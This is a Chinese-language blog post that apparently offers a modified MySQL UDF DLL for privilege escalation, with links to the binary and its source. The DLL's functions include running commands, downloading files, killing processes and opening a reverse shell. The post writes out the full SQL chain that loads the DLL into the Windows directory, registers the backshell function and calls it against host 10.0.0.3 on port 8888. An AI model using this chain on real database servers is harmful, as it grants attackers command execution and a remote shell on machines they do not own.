Mysql 利用提权.,利用MYSQL 供的 UDF接口

gleon

功能函数:

cmdshell 执行cmd;
downloader 下载者,到网上下载指定文件并保存到指定目录;
backshell 反弹Shell;
ProcessView 枚举系统进程;
KillProcess 终止指定进程;

use mysql
create table udfdata(abc longblob); #类型为longblob
insert into udfdata values(load_file("c:\\udf.dll"));
select * from udfdata into dumpfile 'c:\\windows\\udf.dll';
create function backshell returns string soname 'c:\\windows\\udf.dll';
select backshell("10.0.0.3",8888);

原代码:langouster
感觉太大了.!不怎么很好用修改了一下..
Click to Download

源码
Click to Download

关注微信公众号,手机阅读更方便: 程序员的阅微草堂

知识共享许可协议莿鸟栖草堂CFC4N 创作,采用 知识共享 署名-非商业性使用-相同方式共享(3.0未本地化版本)许可协议进行许可。基于http://www.cnxct.com上的作品创作。转载请注明转自:Mysql 利用提权.,利用MYSQL 供的 UDF接口

猜你喜欢:

  1. 经验总结:mysql 的一些基本应用
  2. update注射(mysql+php)的两个模式
  3. QQ游戏最新版多开补丁
  4. Backdoor.Win32.IRCBot.st 蠕虫公告
  5. 如何防止入侵:My SQL各种攻击方法大全

2 thoughts on “Mysql 利用提权.,利用MYSQL 供的 UDF接口

发表评论

电子邮件地址不会被公开。 必填项已用*标注

This site uses Akismet to reduce spam. Learn how your comment data is processed.